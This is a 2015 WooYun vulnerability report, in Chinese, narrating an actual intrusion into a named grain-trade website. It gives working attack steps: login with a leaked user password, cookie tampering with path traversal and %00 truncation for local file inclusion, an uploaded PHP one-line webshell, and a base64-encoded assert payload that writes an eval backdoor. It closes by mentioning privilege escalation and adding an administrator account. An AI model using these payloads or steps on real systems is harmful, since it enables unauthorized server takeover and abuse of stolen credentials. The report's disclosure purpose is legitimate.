漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0113134
漏洞标题:中国粮食网存在文件包含漏洞 getshell
相关厂商:中国粮食网
漏洞作者: Virink
提交时间:2015-05-22 18:07
修复时间:2015-07-06 18:08
公开时间:2015-07-06 18:08
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-06: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
存在文件包含漏洞 直接getshell
详细说明:
第一部当然是扫目录,没说的4这站就有点垃圾了,能看目录下的文件。
分别打开几个顺眼的,Web.config,1.rar等文件都没什么用处。
./db下有新发现
5管理员的密码已经改了,但是其他用户的还能用。
这里我随便找了个登陆进去:ms8909009
结果发现,我居然打不开旁边的菜单、这个问题可以看源码直接打开连接,但是我还是没发现什么能够利用的。
仔细研究研究,发现身份这里可能有的用处
有什么用呢?我也不知道,但是我们来看下cookies
groupid亮了,说不定可以从这里突破,我们修改它看看,分别改成0,1,2,3,5
会员等级变了,同时改为0的时候出现了一点可能存在的漏洞。
因为它出错了!!!
很明显,包含漏洞可能存在。我们进入groupid目录看看是什么情况。
由此,我们可以得到包含的格式include “目录……”.getcookies(“groupid”).”.php”;
数字部分是通过cookie得到的,那么,我们不就可以自定义了吗。
这个是本地包含漏洞,那么我们要怎样上传一个文件让他包含?
测试了很久,我发现前面那个站和这个站是在同一个文件夹里,
怎么测试出来?当然是sql注入报错,爆出目录。
http://www.ahzxk.com/》http://www.cereal.com.cn/ahzxk
那么,这样我们不就可以在前一个站用fck上传文件,然后在进行包含。
其实当前站也是可以上传的(乱翻目录的时候在上传目录看到了前辈的死马xx.txt),但是不知道为什么无法我就用不了,可能我没找到,或者被修复了。
回归正题,我们上传一个小马(个人习惯)。
<?php $_GET[a]($_GET[b]);?>》wt.txt
找到路径:./ahzxk/medialivehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/file/wt.txt
然后修改cookies,groupid=/../../ahzxk/medialivehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/file/wt.txt
刷新看一看,还是出错。可以看到,被包含文件后面多了.php。
瞧我这机型,前面都说了它会自动加上.php
这问题很好解决,用%00就可以截断了
修改cookies,groupid=/../../ahzxk/medialivehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/file/wt.txt%00
出现了这样的错误,说明,我们的文件已经成功包含进去了。
我们打开他的直接包含文件
http://www.cereal.com.cn/user/user_center/user_top.php
然后url后面还要加上:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
出现了这样的警告,看来我们的小马已经成功写入了。
打开地址看看http://www.cereal.com.cn/user/user_center/c.php
Verygood。
自此完成getshell。
后面提权的就不说了,不看不知道,一看吓一跳,完全就是0防御,nt权限还没有防火墙和杀软,随便添加一个administrators账户,完虐!
虽然开启了3389,可惜是内网~~实在是可惜~~
漏洞证明:
修复方案:
版权声明:转载请注明来源 Virink@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝